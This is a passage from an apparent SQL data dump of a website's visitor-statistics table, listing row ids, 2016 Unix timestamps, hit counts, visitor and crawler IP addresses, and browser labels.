55','other'),(53513,1469986237,1,1,0,0,'207.46.13.153','other'),(53514,1469988511,1,1,0,0,'164.132.161.46','other'),(53515,1469988540,1,1,0,0,'91.124.118.216','firefox'),(53516,1469988700,2,2,0,0,'208.115.113.82','other'),(53517,1469989403,1,1,0,0,'51.255.65.23','other'),(53518,1469990786,1,0,1,0,'66.249.69.185',''),(53519,1469991474,1,0,1,0,'66.249.69.149',''),(53520,1469991772,1,0,1,0,'66.249.75.88',''),(53521,1469991858,1,1,0,0,'180.76.15.149','other'),(53522,1469992177,1,0,1,0,'66.249.75.32',''),(53523,1469992594,1,0,1,0,'66.249.69.152',''),(53524,1469993056,1,1,0,0,'180.76.15.30','other'),(53525,1469996116,1,1,0,0,'91.196.178.72','other'),(53526,1469996513,1,1,0,0,'66.249.69.187','chrome'),(53527,1469996874,1,0,1,0,'66.249.69.185',''),(53528,1469997156,1,0,1,0,'66.249.69.189',''),(53529,1469997315,1,1,0,0,'207.46.13.133','other'),(53530,1469999300,1,1,0,0,'2.35.193.30','firefox'),(53531,1470000014,1,1,0,0,'46.219.253.205','chrome'),(53532,1470000688,5,5,0,0,'91.196.178.40','chrome'),(53533,1470000888,1,1,0,0,'141.8.142.67','other'),(53534,1470001777,1,0,1,0,'68.180.230.111',''),(53535,1470002208,1,1,0,0,'180.76.15.20','other'),(53536,1470002352,1,1,0,0,'141.8.183.25','other'),(53537,1470003392,1,0,1,0,'66.249.75.48',''),(53538,1470003691,2,2,0,0,'141.8.142.61','other'),(53539,1470004605,1,1,0,0,'217.69.133.3','other'),(53540,1470005109,1,1,0,0,'141.8.142.58','other'),(53541,1470005362,1,1,0,0,'130.193.50.34','other'),(53542,1470006410,1,0,1,0,'66.249.75.48',''),(53543,1470006503,1,1,0,0,'130.193.50.34','other'),(53544,1470006587,1,0,1,0,'66.249.69.155',''),(53545,1470006601,1,0,1,0,'66.249.69.187',''),(53546,1470008041,1,1,0,0,'130.193.50.34','other'),(53547,1470008061,1,1,0,0,'40.77.167.35','other'),(53548,1470008174,1,1,0,0,'141.8.183.25','other'),(53549,1470008265,1,1,0,0,'185.4.43.65','other'),(53550,1470008860,1,1,0,0,'157.55.39.13','other'),(53551,1470009232,1,0,1,0,'66.249.69.187',''),(53552,1470013658,2,2,0,0,'130.193.51.19','other'),(53553,1470014090,1,1,0,0,'66.249.75.48','chrome'),(53554,1470014230,1,1,0,0,'66.249.75.81','chrome'),(53555,1470016417,1,1,0,0,'130.193.51.19','other'),(53556,1470018145,2,2,0,0,'208.115.113.82','other'),(53557,1470018847,1,0,1,0,'66.249.69.187',''),(53558,1470019471,1,1,0,0,'51.255.65.79','other'),(53559,1470020629,13,13,0,0,'5.9.89.170','other'),(53560,1470020794,2,2,0,0,'130.193.50.34','other'),(53561,1470020914,1,1,0,0,'130.193.51.19','other'),(53562,1470020932,2,2,0,0,'141.8.183.25','other'),(53563,1470023571,1,1,0,0,'141.8.142.58','other'),(53564,1470023897,1,1,0,0,'130.193.50.34','other'),(53565,1470025107,1,1,0,0,'164.132.161.76','other'),(53566,1470026990,1,0,1,0,'66.249.69.187',''),(53567,1470027302,1,1,0,0,'51.255.65.62','other'),(53568,1470028270,1,1,0,0,'180.76.15.34','other'),(53569,1470029033,1,1,0,0,'212.55.85.134','chrome'),(53570,1470029040,1,1,0,0,'91.196.178.72','chrome'),(53571,1470029354,1,1,0,0,'66.102.9.113','chrome'),(53572,1470029392,1,1,0,0,'94.179.13.156','firefox'),(53573,1470031752,1,1,0,0,'91.196.178.65','chrome'),(53574,1470031835,1,1,0,0,'157.55.39.13','other'),(53575,1470032574,1,1,0,0,'94.179.13.156','firefox'),(53576,1470032671,151,151,0,0,'5.9.111.70','other'),(53577,1470032689,2,2,0,0,'149.202.48.240','other'),(53578,1470033938,1,1,0,0,'157.55.39.13','other'),(53579,1470034326,2,2,0,0,'91.196.178.70','firefox'),(53580,1470034615,19,19,0,0,'46.4.32.75','other'),(53581,1470034785,1,1,0,0,'130.193.51.19','other'),(53582,1470034819,2,2,0,0,'91.196.178.69','firefox'),(53583,1470035080,1,1,0,0,'91.196.179.33','firefox'),(53584,1470035584,1,1,0,0,'82.207.91.234','firefox'),(53585,1470037737,1,1,0,0,'37.55.59.92','chrome'),(53586,1470038096,1,1,0,0,'46.219.249.236','opera'),(53587,1470038814,1,1,0,0,'46.211.137.40','chrome'),(53588,1470038881,1,1,0,0,'91.196.178.68','firefox'),(53589,1470039978,1,1,0,0,'37.53.161.96','chrome'),(53590,1470041300,1,0,1,0,'66.249.75.81',''),(53591,1470041303,1,0,1,0,'66.249.75.48',''),(53592,1470041355,1,0,1,0,'66.249.75.88',''),(53593,1470041673,1,1,0,0,'91.124.238.64','chrome'),(53594,1470041717,2,0,2,0,'66.249.75.32',''),(53595,1470042279,1,0,1,0,'66.249.75.95',''),(53596,1470043087,1,1,0,0,'212.90.182.82','chrome'),(53597,1470043285,1,0,1,0,'66.249.75.95',''),(53598,1470043624,1,1,0,0,'5.255.253.67','other'),(53599,1470044150,1,1,0,0,'91.196.178.65','chrome'),(53600,1470044427,1,1,0,0,'31.43.25.45','chrome'),(53601,1470045017,1,1,0,0,'164.132.161.24','other'),(53602,1470045294,2,2,0,0,'91.196.178.70','firefox'),(53603,1470045545,1,1,0,0,'91.196.178.101','chrome'),(53604,1470046880,1,1,0,0,'66.102.9.113','chrome'),(53605,1470046881,1,1,0,0,'66.102.9.93','chrome'),(53606,1470047084,1,1,0,0,'208.115.113.82','other'),(53607,1470047600,1,1,0,0,'51.255.65.15','other'),(53608,1470048328,1,1,0,0,'51.255.65.38','other'),(53609,1470048484,1,1,0,0,'151.80.31.166','other'),(53610,1470048983,1,1,0,0,'164.132.161.77','other'),(53611,1470050467,1,1,0,0,'130.193.51.19','other'),(53612,1470050533,1,1,0,0,'141.8.142.58','other'),(53613,1470050603,1,1,0,0,'130.193.50.34','other'),(53614,1470050677,1,1,0,0,'141.8.183.25','other'),(53615,1470051970,1,1,0,0,'82.145.216.249','other'),(53616,1470052965,1,1,0,0,'130.180.208.230','chrome'),(53617,1470053029,1,1,0,0,'195.162.71.242','chrome'),(53618,1470053208,1,1,0,0,'77.222.153.236','other'),(53619,1470053275,1,1,0,0,'180.76.15.146','other'),(53620,1470053447,1,1,0,0,'92.113.49.48','chrome'),(53621,1470053800,1,1,0,0,'178.95.5.193','chrome'),(53622,1470054698,1,1,0,0,'91.196.178.135','firefox'),(53623,1470055311,1,1,0,0,'164.132.161.31','other'),(53624,1470056721,1,1,0,0,'51.255.65.8','other'),(53625,1470057890,1,1,0,0,'164.132.161.88','other'),(53626,1470058110,1,1,0,0,'178.151.160.121','other'),(53627,1470059066,1,1,0,0,'51.255.65.70','other'),(53628,1470059207,2,2,0,0,'159.224.33.187','chrome'),(53629,1470059242,3,0,3,0,'66.249.69.187',''),(53630,1470059262,1,0,1,0,'66.249.69.155',''),(53631,1470059276,1,0,1,0,'66.249.69.152',''),(53632,1470059331,1,0,1,0,'66.249.75.81',''),(53633,1470059421,1,0,1,0,'66.249.69.185',''),(53634,1470059859,1,1,0,0,'176.77.119.87','chrome'),(53635,1470059861,1,1,0,0,'176.77.89.69','chrome'),(53636,1470059862,1,1,0,0,'176.77.92.0','chrome'),(53637,1470059863,1,1,0,0,'176.14.8.63','chrome'),(53638,1470060028,1,1,0,0,'91.196.178.68','firefox'),(53639,1470060694,2,0,2,0,'66.249.69.155',''),(53640,1470061020,4,0,4,0,'66.249.75.81',''),(53641,1470061065,1,1,0,0,'91.196.178.70','firefox'),(53642,1470061441,1,1,0,0,'180.76.15.32','other'),(53643,1470061718,1,1,0,0,'94.179.99.77','firefox'),(53644,1470061749,1,1,0,0,'130.193.51.19','other'),(53645,1470063068,1,0,1,0,'66.249.75.32',''),(53646,1470063352,1,1,0,0,'164.132.161.67','other'),(53647,1470063804,1,1,0,0,'151.80.31.101','other'),(53648,1470064398,1,0,1,0,'66.249.75.40',''),(53649,1470064399,1,1,0,0,'40.77.167.2','other'),(53650,1470064516,1,1,0,0,'91.196.178.71','firefox'),(53651,1470064885,1,1,0,0,'51.255.65.91','other'),(53652,1470065000,1,1,0,0,'195.154.183.187','chrome'),(53653,1470065573,1,0,1,0,'66.249.69.149',''),(53654,1470066431,1,0,1,0,'66.249.75.48',''),(53655,1470066533,1,1,0,0,'91.196.178.103','chrome'),(53656,1470067506,1,1,0,0,'141.8.142.62','other'),(53657,1470067695,1,1,0,0,'51.255.65.94','other'),(53658,1470067851,1,0,1,0,'66.249.75.32',''),(53659,1470067955,1,0,1,0,'66.249.69.149',''),(53660,1470069566,1,1,0,0,'51.255.65.7','other'),(53661,1470069877,2,2,0,0,'193.110.18.61','firefox'),(53662,1470069909,4,4,0,0,'130.193.51.19','other'),(53663,1470069990,3,3,0,0,'141.8.183.25','other'),(53664,1470070137,2,2,0,0,'141.8.142.58','other'),(53665,1470070531,1,1,0,0,'130.193.50.34','other'),(53666,1470070661,1,1,0,0,'51.255.65.2','other'),(53667,1470070850,1,1,0,0,'178.92.248.193','firefox'),(53668,1470071382,1,1,0,0,'178.216.226.220','opera'),(53669,1470071878,1,1,0,0,'164.132.161.83','other'),(53670,1470072769,1,1,0,0,'164.132.161.97','other'),(53671,1470072953,1,1,0,0,'208.115.113.82','other'),(53672,1470074500,1,0,1,0,'66.249.65.182',''),(53673,1470075252,1,0,1,0,'66.249.65.188',''),(53674,1470075269,1,1,0,0,'164.132.161.25','other'),(53675,1470075476,1,0,1,0,'66.249.65.183',''),(53676,1470075907,1,0,1,0,'66.249.65.182',''),(53677,1470076399,1,1,0,0,'141.8.142.61','other'),(53678,1470076532,1,1,0,0,'141.8.183.25','other'),(53679,1470077323,1,1,0,0,'91.196.178.39','firefox'),(53680,1470077512,1,1,0,0,'91.196.178.134','chrome'),(53681,1470077581,1,1,0,0,'40.77.167.35','other'),(53682,1470078600,1,0,1,0,'66.249.65.188',''),(53683,1470078638,2,0,2,0,'66.249.65.180',''),(53684,1470079140,1,1,0,0,'178.93.137.102','chrome'),(53685,1470079538,1,1,0,0,'51.255.65.97','other'),(53686,1470080560,1,1,0,0,'164.132.161.21','other'),(53687,1470081194,1,1,0,0,'51.255.65.92','other'),(53688,1470082226,1,0,1,0,'66.249.65.185',''),(53689,1470082829,1,1,0,0,'66.102.6.141','other'),(53690,1470084336,1,1,0,0,'66.102.6.145','other'),(53691,1470084668,1,1,0,0,'66.102.6.149','other'),(53692,1470085218,1,1,0,0,'164.132.161.68','other'),(53693,1470085845,1,1,0,0,'180.76.15.145','other'),(53694,1470086000,1,1,0,0,'157.55.39.13','other'),(53695,1470086038,2,0,2,0,'66.249.65.183',''),(53696,1470086271,1,0,1,0,'66.249.65.180',''),(53697,1470087342,1,0,1,0,'66.249.65.182',''),(53698,1470088032,1,1,0,0,'164.132.161.50','other'),(53699,1470088442,1,0,1,0,'66.249.65.185',''),(53700,1470088688,1,0,1,0,'66.249.65.188',''),(53701,1470090038,1,1,0,0,'180.76.15.5','other'),(53702,1470090042,1,0,1,0,'66.249.65.188',''),(53703,1470092047,1,1,0,0,'180.76.15.9','other'),(53704,1470092545,1,1,0,0,'174.129.237.157','other'),(53705,1470094057,1,1,0,0,'180.76.15.142','other'),(53706,1470095989,1,1,0,0,'51.255.65.31','other'),(53707,1470097612,1,1,0,0,'167.114.233.118','firefox'),(53708,1470098334,1,1,0,0,'180.76.15.8','other'),(53709,1470099809,1,1,0,0,'164.132.161.88','other'),(53710,1470100882,1,1,0,0,'208.115.113.92','other'),(53711,1470101094,1,1,0,0,'164.132.161.77','other'),(53712,1470101838,1,0,1,0,'68.180.230.178',''),(53713,1470102666,1,0,1,0,'66.249.65.183',''),(53714,1470104539,1,0,1,0,'66.249.65.183',''),(53715,1470104585,1,0,1,0,'66.249.65.185',''),(53716,1470108109,1,0,1,0,'66.249.65.185',''),(53717,1470109914,1,1,0,0,'164.132.161.39','other'),(53718,1470110396,1,0,1,0,'68.180.230.178',''),(53719,1470113307,1,1,0,0,'208.115.113.92','other'),(53720,1470114879,1,0,1,0,'68.180.230.178',''),(53721,1470115071,1,1,0,0,'212.55.85.134','chrome'),(53722,1470118223,1,1,0,0,'46.219.249.236','opera'),(53723,1470119312,1,0,1,0,'68.180.230.111',''),(53724,1470119793,1,1,0,0,'93.73.234.193','firefox'),(53725,1470119960,1,1,0,0,'94.179.2.99','firefox'),(53726,1470120064,1,1,0,0,'66.249.83.244','chrome'),(53727,1470121053,1,1,0,0,'207.46.13.71','other'),(53728,1470123954,1,1,0,0,'92.113.32.233','opera'),(53729,1470124061,1,1,0,0,'91.196.178.40','firefox'),(53730,1470124964,1,1,0,0,'91.196.178.72','chrome'),(53731,1470124992,36,36,0,0,'85.14.244.98','other'),(53732,1470125001,40,40,0,0,'85.14.244.113','other'),(53733,1470125003,35,35,0,0,'193.111.140.106','other'),(53734,1470125670,1,1,0,0,'91.236.184.19','opera'),(53735,1470126328,1,1,0,0,'91.196.178.67','firefox'),(53736,1470126347,1,0,1,0,'66.249.65.185',''),(53737,1470127059,1,1,0,0,'91.196.178.68','firefox'),(53738,1470127718,1,1,0,0,'94.179.2.99','firefox'),(53739,1470127933,1,1,0,0,'91.196.178.72','firefox'),(53740,1470127951,1,1,0,0,'207.46.13.122','other'),(53741,1470128126,1,1,0,0,'94.153.231.130','firefox'),(53742,1470128149,1,1,0,0,'91.196.178.68','firefox'),(53743,1470128583,1,1,0,0,'208.115.113.92','other'),(53744,1470129265,1,1,0,0,'91.196.178.68','firefox'),(53745,1470129412,2,1,1,0,'66.249.65.185',''),(53746,1470129737,1,0,1,0,'66.249.65.182',''),(53747,1470129806,1,1,0,0,'66.220.158.119','other'),(53748,1470129809,1,1,0,0,'31.13.98.118','other'),(53749,1470129810,1,1,0,0,'31.13.100.118','other'),(53751,1470130476,1,1,0,0,'91.196.178.68','firefox'),(53752,1470130654,1,1,0,0,'95.135.89.97','other'),(53753,1470131776,1,1,0,0,'66.249.65.185','chrome'),(53754,1470133988,1,1,0,0,'207.46.13.122','other'),(53755,1470134591,2,2,0,0,'46.201.239.218','firefox'),(53756,1470134779,1,1,0,0,'66.102.9.93','chrome'),(53757,1470135351,1,1,0,0,'46.200.253.62','chrome'),(53758,1470136190,1,1,0,0,'95.158.6.58','chrome'),(53759,1470136624,1,1,0,0,'94.179.73.239','firefox'),(53760,1470136670,1,1,0,0,'91.196.178.72','chrome'),(53761,1470137693,1,1,0,0,'91.196.178.68','firefox'),(53762,1470138885,1,0,1,0,'66.249.65.185',''),(53763,1470138957,1,1,0,0,'46.200.112.251','chrome'),(53764,1470139902,1,1,0,0,'208.115.113.82','other'),(53765,1470141253,1,1,0,0,'91.196.178.68','firefox'),(53766,1470141304,1,0,1,0,'68.180.230.111',''),(53767,1470141363,1,1,0,0,'37.53.227.112','chrome'),(53768,1470142250,1,0,1,0,'68.180.230.111',''),(53769,1470142280,1,1,0,0,'37.53.227.112','chrome'),(53770,1470142553,2,2,0,0,'91.196.178.67','firefox'),(53771,1470143511,1,1,0,0,'91.196.178.68','firefox'),(53772,1470144602,1,1,0,0,'180.76.15.155','other'),(53773,1470144855,1,1,0,0,'141.0.15.38','other'),(53774,1470145233,1,1,0,0,'91.196.178.167','chrome'),(53775,1470146160,1,1,0,0,'91.196.178.68','firefox'),(53776,1470146401,1,1,0,0,'195.162.71.243','opera'),(53777,1470146568,2,2,0,0,'37.53.229.154','firefox'),(53778,1470147061,1,1,0,0,'207.46.13.122','other'),(53779,1470147453,1,1,0,0,'66.102.9.113','chrome'),(53780,1470148167,1,0,1,0,'66.249.65.185',''),(53781,1470148620,1,1,0,0,'180.76.15.19','other'),(53782,1470148641,1,1,0,0,'91.196.178.97','chrome'),(53783,1470149387,1,0,1,0,'66.249.65.183',''),(53784,1470150429,1,1,0,0,'91.196.178.97','chrome'),(53785,1470150953,1,0,1,0,'66.249.65.183',''),(53786,1470151886,1,1,0,0,'193.110.18.58','firefox'),(53787,1470153134,1,0,1,0,'66.249.65.188',''),(53788,1470153927,1,1,0,0,'91.196.178.102','chrome'),(53789,1470155260,1,1,0,0,'91.196.178.65','firefox'),(53790,1470155599,1,1,0,0,'91.196.178.99','chrome'),(53791,1470155867,1,1,0,0,'5.228.95.117','msie'),(53792,1470156177,1,1,0,0,'91.196.178.97','chrome'),(53793,1470157158,1,1,0,0,'37.55.226.14','firefox'),(53794,1470157311,1,1,0,0,'46.211.112.146','chrome'),(53795,1470157413,1,0,1,0,'66.249.64.155',''),(53796,1470157543,1,1,0,0,'188.32.240.65','msie'),(53797,1470158208,1,1,0,0,'208.115.113.92','other'),(53798,1470158384,1,1,0,0,'157.55.39.13','other'),(53799,1470158571,1,1,0,0,'91.196.178.99','chrome'),(53800,1470158583,1,1,0,0,'157.55.39.28','other'),(53801,1470159323,1,1,0,0,'130.180.217.69','chrome'),(53802,1470160649,1,1,0,0,'91.196.178.99','chrome'),(53803,1470161852,1,1,0,0,'91.196.178.99','chrome'),(53804,1470162396,1,0,1,0,'66.249.64.189',''),(53805,1470163270,2,2,0,0,'82.145.210.233','other'),(53806,1470164903,1,1,0,0,'82.145.216.153','other'),(53807,1470165968,1,1,0,0,'91.196.178.99','chrome'),(53808,1470166734,1,1,0,0,'208.115.113.92','other'),(53809,1470167844,1,1,0,0,'91.196.178.100','chrome'),(53810,1470168227,1,1,0,0,'157.55.39.13','other'),(53811,1470168294,1,0,1,0,'66.249.64.187',''),(53812,1470168985,1,1,0,0,'212.55.85.134','chrome'),(53813,1470174482,1,1,0,0,'208.115.113.92','other'),(53814,1470179657,1,1,0,0,'180.76.15.16','other'),(53815,1470182089,1,1,0,0,'157.55.39.13','other'),(53816,1470185293,1,1,0,0,'207.46.13.71','other'),(53817,1470185876,1,0,1,0,'66.249.64.152',''),(53818,1470186561,1,0,1,0,'66.249.64.149',''),(53819,1470186647,1,0,1,0,'68.180.230.111',''),(53820,1470186688,1,1,0,0,'180.76.15.8','other'),(53821,1470188734,1,1,0,0,'208.115.113.92','other'),(53822,1470189156,1,0,1,0,'66.249.64.185',''),(53823,1470193335,1,0,1,0,'66.249.64.155',''),(53824,1470193554,1,1,0,0,'66.249.64.155','other'),(53825,1470194339,1,1,0,0,'66.102.9.93','chrome'),(53826,1470194458,1,0,1,0,'66.249.64.155',''),(53827,1470195516,1,1,0,0,'91.196.178.164','other'),(53828,1470197181,2,1,1,0,'66.249.64.189',''),(53829,1470197225,1,1,0,0,'66.249.64.155','chrome'),(53830,1470197859,1,1,0,0,'207.46.13.71','other'),(53831,1470200774,1,1,0,0,'195.225.147.30','opera'),(53832,1470200949,1,1,0,0,'54.244.49.249','msie'),(53833,1470201595,1,1,0,0,'212.55.85.134','chrome'),(53834,1470201646,1,1,0,0,'66.249.93.113','chrome'),(53835,1470201887,1,1,0,0,'91.196.178.68','firefox'),(53836,1470202050,1,1,0,0,'91.192.135.241','firefox'),(53837,1470202067,1,1,0,0,'130.193.51.19','other'),(53838,1470202095,1,1,0,0,'180.76.15.150','other'),(53839,1470203510,1,1,0,0,'37.55.213.177','firefox'),(53840,1470204443,1,1,0,0,'94.179.44.63','firefox'),(53841,1470204519,1,1,0,0,'78.111.176.169','chrome'),(53842,1470205196,2,2,0,0,'144.76.29.66','other'),(53843,1470205307,1,1,0,0,'91.196.178.97','chrome'),(53844,1470205443,1,1,0,0,'91.196.177.15','chrome'),(53845,1470207556,1,1,0,0,'66.249.83.250','chrome'),(53846,1470207996,1,1,0,0,'91.196.178.68','firefox'),(53847,1470209366,1,0,1,0,'66.249.64.155',''),(53848,1470209369,11,11,0,0,'85.14.244.98','other'),(53849,1470209372,8,8,0,0,'193.111.140.106','other'),(53850,1470209377,9,9,0,0,'85.14.244.113','other'),(53851,1470209774,1,1,0,0,'91.196.178.68','firefox'),(53852,1470209939,2,0,2,0,'66.249.64.149',''),(53853,1470209961,1,0,1,0,'66.249.64.187',''),(53854,1470210455,1,1,0,0,'95.132.45.226','chrome'),(53855,1470210661,1,1,0,0,'91.196.178.166','chrome'),(53856,1470211095,1,0,1,0,'66.249.64.149',''),(53857,1470212668,2,2,0,0,'91.196.178.65','firefox'),(53858,1470213291,1,1,0,0,'164.132.161.48','other'),(53859,1470214015,1,1,0,0,'164.132.161.59','other'),(53860,1470214058,1,1,0,0,'51.255.65.51','other'),(53861,1470214161,1,1,0,0,'91.196.178.40','firefox'),(53862,1470214508,1,0,1,0,'66.249.64.187',''),(53863,1470214846,1,1,0,0,'164.132.161.44','other'),(53864,1470214865,1,1,0,0,'164.132.161.7','other'),(53865,1470215110,1,1,0,0,'91.196.178.71','firefox'),(53866,1470215319,1,0,1,0,'66.249.64.152',''),(53867,1470215465,1,1,0,0,'91.196.178.40','firefox'),(53868,1470215555,2,2,0,0,'141.8.183.25','other'),(53869,1470215559,1,1,0,0,'95.108.142.31','other'),(53870,1470216031,3,3,0,0,'88.234.146.223','other'),(53871,1470216298,1,1,0,0,'95.132.79.157','other'),(53872,1470216567,1,1,0,0,'51.255.65.18','other'),(53873,1470216893,1,1,0,0,'195.242.179.206','firefox'),(53874,1470216942,1,1,0,0,'51.255.65.61','other'),(53875,1470217398,3,3,0,0,'88.234.146.223','other'),(53876,1470217502,1,0,1,0,'66.249.64.189',''),(53877,1470217629,1,1,0,0,'94.179.76.192','chrome'),(53878,1470218285,1,1,0,0,'95.132.79.157','other'),(53879,1470219411,1,1,0,0,'151.80.31.155','other'),(53880,1470221270,1,1,0,0,'37.54.16.247','firefox'),(53881,1470221614,1,1,0,0,'180.76.15.13','other'),(53882,1470221696,1,1,0,0,'91.196.178.40','firefox'),(53883,1470221836,1,1,0,0,'93.158.152.40','other'),(53884,1470222162,1,1,0,0,'130.193.51.79','other'),(53885,1470222303,1,1,0,0,'164.132.161.2','other'),(53886,1470222339,1,1,0,0,'151.80.31.169','other'),(53887,1470223066,1,1,0,0,'151.80.31.107','other'),(53888,1470223454,1,1,0,0,'130.193.51.19','other'),(53889,1470223540,1,1,0,0,'164.132.161.82','other'),(53890,1470224334,1,1,0,0,'51.255.65.21','other'),(53891,1470224450,1,1,0,0,'91.196.178.72','firefox'),(53892,1470224936,1,1,0,0,'212.55.85.134','chrome'),(53893,1470225033,1,1,0,0,'178.93.217.171','chrome'),(53894,1470225036,1,1,0,0,'91.196.178.68','firefox'),(53895,1470225080,1,1,0,0,'164.132.161.75','other'),(53896,1470225645,1,1,0,0,'37.53.230.244','firefox'),(53897,1470225661,1,1,0,0,'91.196.178.161','firefox'),(53898,1470225745,1,1,0,0,'164.132.161.37','other'),(53899,1470226255,1,1,0,0,'91.196.178.68','firefox'),(53900,1470226582,1,1,0,0,'51.255.65.95','other'),(53901,1470227045,1,1,0,0,'164.132.161.68','other'),(53902,1470227144,1,1,0,0,'164.132.161.65','other'),(53903,1470227405,2,0,2,0,'66.249.64.187',''),(53904,1470227413,2,0,2,0,'66.249.64.155',''),(53905,1470227447,10,0,10,0,'66.249.64.185',''),(53906,1470227596,1,1,0,0,'91.196.178.99','opera'),(53907,1470227615,1,1,0,0,'93.158.152.84','other'),(53908,1470227652,1,0,1,0,'66.249.64.152',''),(53909,1470227754,1,1,0,0,'5.255.253.68','other'),(53910,1470227793,5,0,5,0,'66.249.64.149',''),(53911,1470228602,1,1,0,0,'164.132.161.81','other'),(53912,1470228606,1,1,0,0,'94.179.85.30','chrome'),(53913,1470228612,1,0,1,0,'66.249.64.155',''),(53914,1470228655,2,0,2,0,'66.249.64.152',''),(53915,1470228709,1,1,0,0,'62.80.188.190','chrome'),(53916,1470229091,1,1,0,0,'217.20.146.40','other'),(53917,1470229094,1,1,0,0,'94.100.184.100','msie'),(53918,1470229262,1,1,0,0,'51.255.65.2','other'),(53919,1470229270,1,1,0,0,'91.196.178.101','chrome'),(53920,1470229524,1,0,1,0,'66.249.64.189',''),(53921,1470229673,1,1,0,0,'94.153.192.46','firefox'),(53922,1470229710,1,1,0,0,'95.134.202.18','other'),(53923,1470229780,1,1,0,0,'37.55.226.14','firefox'),(53924,1470230036,1,1,0,0,'37.53.90.175','chrome'),(53925,1470230445,1,1,0,0,'207.46.13.71','other'),(53926,1470230571,1,1,0,0,'51.255.65.92','other'),(53927,1470230960,1,1,0,0,'51.255.65.50','other'),(53928,1470230985,1,1,0,0,'94.153.192.46','firefox'),(53929,1470231044,1,1,0,0,'91.196.178.103','firefox'),(53930,1470231328,1,1,0,0,'91.196.178.71','firefox'),(53931,1470231566,1,1,0,0,'141.8.132.41','other'),(53932,1470231774,1,1,0,0,'164.132.161.93','other'),(53933,1470232579,1,1,0,0,'37.52.21.117','chrome'),(53934,1470232722,1,1,0,0,'77.88.208.13','firefox'),(53935,1470232740,1,1,0,0,'151.80.31.158','other'),(53936,1470233133,1,1,0,0,'94.179.125.47','chrome'),(53937,1470233466,1,1,0,0,'91.196.178.134','other'),(53938,1470234088,1,0,1,0,'66.249.64.189',''),(53939,1470234690,1,1,0,0,'91.196.178.134','other'),(53940,1470235211,1,1,0,0,'95.135.55.10','chrome'),(53941,1470235257,1,0,1,0,'66.249.64.187',''),(53942,1470235954,1,1,0,0,'208.115.113.82','other'),(53943,1470235959,1,1,0,0,'77.37.140.222','msie'),(53944,1470236076,1,1,0,0,'95.132.45.238','chrome'),(53945,1470236261,1,1,0,0,'51.255.65.3','other'),(53946,1470236894,1,1,0,0,'130.193.50.34','other'),(53947,1470237019,1,1,0,0,'91.196.178.168','chrome'),(53948,1470237175,1,1,0,0,'91.196.178.164','other'),(53949,1470237182,2,2,0,0,'178.93.59.104','firefox'),(53950,1470237230,1,1,0,0,'141.8.142.67','other'),(53951,1470237349,1,1,0,0,'37.73.234.140','chrome'),(53952,1470237828,1,1,0,0,'92.113.190.112','chrome'),(53953,1470238182,1,1,0,0,'164.132.161.5','other'),(53954,1470238209,1,1,0,0,'180.76.15.7','other'),(53955,1470238559,1,0,1,0,'66.249.64.155',''),(53956,1470239430,1,1,0,0,'91.196.178.99','chrome'),(53957,1470239549,1,1,0,0,'91.196.178.102','firefox'),(53958,1470239861,1,1,0,0,'91.196.178.72','firefox'),(53959,1470239999,1,1,0,0,'91.196.178.131','chrome'),(53960,1470241421,1,1,0,0,'37.55.226.14','firefox'),(53961,1470241784,1,1,0,0,'208.115.113.82','other'),(53962,1470241835,1,0,1,0,'66.249.64.57',''),(53963,1470241993,1,1,0,0,'91.196.178.99','chrome'),(53964,1470242330,1,0,1,0,'66.249.64.24',''),(53965,1470242455,1,1,0,0,'93.158.152.46','other'),(53966,1470242642,1,1,0,0,'93.158.152.26','other'),(53967,1470242738,1,1,0,0,'188.209.230.159','chrome'),(53968,1470243547,1,1,0,0,'141.8.183.19','other'),(53969,1470243840,1,1,0,0,'93.158.152.26','other'),(53970,1470244281,1,1,0,0,'188.163.5.62','chrome'),(53971,1470244388,1,1,0,0,'141.8.142.58','other'),(53972,1470244589,1,1,0,0,'91.196.178.99','chrome'),(53973,1470244909,1,1,0,0,'141.8.142.67','other'),(53974,1470245045,1,1,0,0,'176.14.244.114','msie'),(53975,1470245499,1,0,1,0,'66.249.64.21',''),(53976,1470245513,1,1,0,0,'66.249.64.24','chrome'),(53977,1470245562,1,1,0,0,'91.196.178.103','chrome'),(53978,1470247064,1,1,0,0,'176.119.92.117','chrome'),(53979,1470247198,1,1,0,0,'91.196.178.99','chrome'),(53980,1470247578,1,1,0,0,'208.115.113.92','other'),(53981,1470247607,1,1,0,0,'212.55.85.134','chrome'),(53982,1470248024,1,1,0,0,'37.115.137.252','chrome'),(53983,1470248282,1,1,0,0,'141.8.142.58','other'),(53984,1470248406,1,1,0,0,'141.8.183.25','other'),(53985,1470248532,1,1,0,0,'141.8.142.67','other'),(53986,1470249087,1,1,0,0,'157.55.39.13','other'),(53987,1470249113,2,0,2,0,'66.249.64.21',''),(53988,1470250014,1,1,0,0,'5.255.253.36','other'),(53989,1470250155,1,1,0,0,'37.115.204.229','chrome'),(53990,1470250224,1,1,0,0,'164.132.161.60','other'),(53991,1470250242,1,0,1,0,'66.249.64.21',''),(53992,1470250707,1,0,1,0,'66.249.64.61',''),(53993,1470250910,1,1,0,0,'164.132.161.2','other'),(53994,1470251472,1,1,0,0,'164.132.161.24','other'),(53995,1470251565,1,1,0,0,'141.0.14.67','other'),(53996,1470252232,1,0,1,0,'66.249.64.27',''),(53997,1470252403,1,0,1,0,'66.249.64.61',''),(53998,1470253088,1,1,0,0,'180.76.15.26','other'),(53999,1470253127,1,1,0,0,'151.80.31.157','other'),(54000,1470253678,113,113,0,0,'138.201.127.112','other'),(54001,1470253710,1,1,0,0,'91.196.178.133','chrome'),(54002,1470253830,1,1,0,0,'91.196.178.99','chrome'),(54003,1470254925,1,1,0,0,'91.196.178.33','chrome'),(54004,1470255159,1,1,0,0,'164.132.161.60','other'),(54005,1470255760,1,1,0,0,'151.80.31.101','other'),(54006,1470255764,1,1,0,0,'141.8.142.78','other'),(54007,1470256011,1,1,0,0,'51.255.65.30','other'),(54008,1470256089,1,1,0,0,'151.80.31.156','other'),(54009,1470256412,1,1,0,0,'208.115.113.82','other'),(54010,1470256549,1,1,0,0,'151.80.31.176','other'),(54011,1470256719,1,1,0,0,'141.8.142.61','other'),(54012,1470257357,1,0,1,0,'66.249.64.24',''),(54013,1470258691,1,1,0,0,'180.76.15.144','other'),(54014,1470258762,1,1,0,0,'164.132.161.97','other'),(54015,1470258884,1,0,1,0,'66.249.64.21',''),(54016,1470259131,1,1,0,0,'151.80.31.168','other'),(54017,1470259986,1,0,1,0,'66.249.64.24',''),(54018,1470260121,1,1,0,0,'207.46.13.71','other'),(54019,1470261304,1,0,1,0,'66.249.64.57',''),(54020,1470263025,1,1,0,0,'94.179.69.146','chrome'),(54021,1470263296,2,0,2,0,'66.249.64.27',''),(54022,1470263385,1,0,1,0,'66